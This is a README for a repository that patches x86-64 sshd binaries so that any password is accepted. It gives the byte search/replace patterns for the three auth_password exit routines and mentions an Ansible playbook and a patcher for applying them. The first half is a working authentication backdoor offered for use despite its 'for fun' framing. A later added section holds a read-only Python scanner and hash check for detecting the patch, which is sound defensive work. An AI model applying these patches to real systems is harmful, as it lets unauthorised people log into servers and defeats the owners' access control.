⚠️ This project was an experiment purely for fun and should be treated as such. Do NOT put in production!
Ever wondered what happens if sshd has had a little too much to drink? Well, it starts accepting any password as valid. This repo contains generic byte search/replace patterns that patch any x86-64 sshd binary so that it accepts any password as valid.
Although the patterns are as generic as possible, they are only for x86-64 and may not work on all OpenSSH versions. Tested versions are as follows:
- Lubuntu 19.10
- Kali 2019.4
- Linux Mint 19.3 XFCE
The tested binaries can be found in `samples`.

Check out the provided Ansible playbook. Alternatively, use my byte pattern patcher with this patch file and point it at your sshd binary. You should see three replaced occurrences, one for each pattern.
The patterns patch all exit routines of `int auth_password(struct ssh *ssh, const char *password)` in `auth-passwd.c` so that it always returns true, i.e. every password is treated as authenticated.

For each routine, the first line is the search pattern and the second line is the replacement; `??` matches any byte in the search line and leaves that byte unchanged in the replacement line. The annotated listing underneath shows the instruction bytes being matched: square brackets stand for one byte written as a bit pattern, where `[11......]` is a register-direct ModR/M byte, `[00...101]` is a RIP-relative ModR/M byte, and `[........]` is any byte (displacement or immediate).
- Patch auth_password exit routine 1

  ```
  31 ?? 85 ?? 0f 95 ?? 21 ??
  31 ?? ?? ?? b8 01 00 00 00
  ```

  ```
  31 [11......]                                                // XOR
  85 [11......]                                                // TEST
  0f 95 [11......]                                             // SETNZ -> MOV EAX, 0x1
  21 [11......]                                                // AND -> OVERWRITTEN
  ```

- Patch auth_password exit routine 2 (2 variations, check patch file)

  ```
  21 ?? 0f b6 ?? eb ??
  b8 01 00 00 00 ?? ??
  ```

  ```
  21 [11......]                                                // AND -> MOV EAX, 0x1
  0f b6 [11......]                                             // MOVZX -> OVERWRITTEN
  eb [........]                                                // JMP
  ```

- Patch auth_password exit routine 3 (2 variations, check patch file)

  ```
  85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8b ?? ?? ?? ?? ?? 85 ??
  85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8b ?? ?? ?? ?? ?? 39 ??
  ```

  ```
  85 [11......]                                                // TEST
  0f 95 [11......]                                             // SETNZ
  83 3d [........] [........] [........] [........] 01         // CMP
  74 [........]                                                // JZ
  8b [00...101] [........] [........] [........] [........]    // MOV
  85 [11......]                                                // TEST -> CMP
  ```
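From the defender's side, the useful question is whether a given sshd binary already carries these modifications. The following scanner is an added example and is not part of this repo or its patcher: it only reads the file, looks for the byte sequences the three patches leave behind, and compares the binary against a known-good SHA-256 supplied by the administrator. The patched-state signatures are an assumption derived from the search/replace pairs above (bytes kept by `??` come from the search line, the rest are the literal replacement bytes); the sample "binaries" are constructed for the demo and are not real sshd code.

```python
"""Defender-side check for an sshd binary: signature scan plus hash compare.

Added example, not part of this repository. It never writes to the file.
"""
import hashlib
import re
import sys

# Patched-state signatures (assumption, derived from the README patterns):
#   routine 1: 31 ?? 85 ?? is kept, 0f 95 ?? 21 ?? becomes b8 01 00 00 00
#   routine 2: 21 ?? 0f b6 ?? becomes b8 01 00 00 00, eb ?? is kept
#   routine 3: identical to the search pattern except the final 85 -> 39
# '??' is a one-byte wildcard.
PATCHED_SIGNATURES = {
    "auth_password exit routine 1": "31 ?? 85 ?? b8 01 00 00 00",
    "auth_password exit routine 2": "b8 01 00 00 00 eb ??",
    "auth_password exit routine 3":
        "85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8b ?? ?? ?? ?? ?? 39 ??",
}


def pattern_to_regex(pattern):
    """Turn 'aa ?? bb' into a compiled bytes regex; '??' matches any byte."""
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    # DOTALL so that '.' also matches 0x0a inside the binary
    return re.compile(b"".join(parts), re.DOTALL)


def find_signatures(data, signatures=PATCHED_SIGNATURES):
    """Return {signature name: [offsets]} for every signature found in data."""
    hits = {}
    for name, pat in signatures.items():
        offsets = [m.start() for m in pattern_to_regex(pat).finditer(data)]
        if offsets:
            hits[name] = offsets
    return hits


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def hash_matches(data, expected_sha256):
    """True if data hashes to the known-good value (case-insensitive hex)."""
    return sha256_hex(data) == expected_sha256.strip().lower()


def scan(data, expected_sha256=None):
    """Combine both checks; hash_ok is None when no reference hash is given."""
    report = {"signatures": find_signatures(data), "hash_ok": None}
    if expected_sha256 is not None:
        report["hash_ok"] = hash_matches(data, expected_sha256)
    return report


# Constructed samples for the demo (not real sshd code): a prologue byte
# sequence, the exit-routine-1 shape before/after patching, then ret.
PATCHED_SAMPLE = bytes.fromhex("4889e5" "31c085c0b801000000" "c3")
UNPATCHED_SAMPLE = bytes.fromhex("4889e5" "31c085c00f95c021c2" "c3")


if __name__ == "__main__":
    if len(sys.argv) >= 2:
        # usage: python3 sshd_check.py /path/to/sshd [known-good-sha256]
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
        ref = sys.argv[2] if len(sys.argv) >= 3 else None
        print(scan(blob, ref))
    else:
        print("patched sample:  ", scan(PATCHED_SAMPLE))
        print("unpatched sample:", scan(UNPATCHED_SAMPLE))
```

Treat a signature hit as an indicator, not proof: `b8 01 00 00 00` (`mov eax, 1`) is common code, so the shorter signatures can hit legitimate functions. The hash comparison is the authoritative check; on a packaged system the same thing can be done with `dpkg --verify openssh-server` or `rpm -V openssh-server`, which compare the installed file against the package manifest.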